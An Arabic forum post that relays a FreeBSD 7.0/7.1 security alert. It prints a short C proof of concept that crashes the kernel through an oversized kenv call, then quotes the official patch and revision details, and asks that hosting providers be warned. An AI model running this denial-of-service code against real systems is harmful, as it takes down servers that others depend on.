الســــلام عليكم ...
حبيت انقل لكم خبر ظهور لوكل جديد توه بانزل بمواقع السيكيورتي للنظام فري بي سي دي FreeBSD 7.0/1
يعمل على الأنظمة التاليه ...
كود:
* - Tested on: FreeBSD 7.0
* FreeBSD 7.1
------
بلإضافة للوكل Kernel Panic DoS Exploit
الثغره بسيطة وانما هي فقط .
كود:
#include <kenv.h>
#include <stdio.h>
void main(){
kenv(KENV_DUMP,NULL,123123123,123123123);
}
FreeBSD Local root 7.0/1
Local Kernel Panic DoS
Exploit
طبعا بلنسبة للترقيع من مصدر الFreeBSD
كود:
a) Download the patch from the location below, and verify the
detached PGP signature using your PGP utility.
# fetch http://security.FreeBSD.org/patches/EN-09:01/kenv.patch
# fetch http://security.FreeBSD.org/patches/EN-09:01/kenv.patch.asc
b) Apply the patch.
# cd /usr/src
# patch < /path/to/patch
c) Recompile your kernel as described in
<URL:http://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.
VI. Correction details
The following list contains the revision numbers of each file that was
corrected in FreeBSD.
CVS:
Branch Revision
Path
- -------------------------------------------------------------------------
RELENG_7
src/sys/kern/kern_environment.c 1.47.2.1
RELENG_7_1
src/UPDATING 1.507.2.13.2.7
src/sys/conf/newvers.sh 1.72.2.9.2.8
src/sys/kern/kern_environment.c 1.47.6.2
RELENG_7_0
src/UPDATING 1.507.2.3.2.15
src/sys/conf/newvers.sh 1.72.2.5.2.15
src/sys/kern/kern_environment.c 1.47.4.1
- -------------------------------------------------------------------------
Subversion:
Branch/path Revision
- -------------------------------------------------------------------------
stable/7/ r190301
releng/7.1/ r190301
releng/7.0/ r190301
- -------------------------------------------------------------------------
ياليت يتم تنبيه اصحاب الإستضافات للموضوع ضروري جدا بلطبع !
الموضوع منقول من منتديات قواعـــد الحمـــاية
المصـــــــدر
تحياتي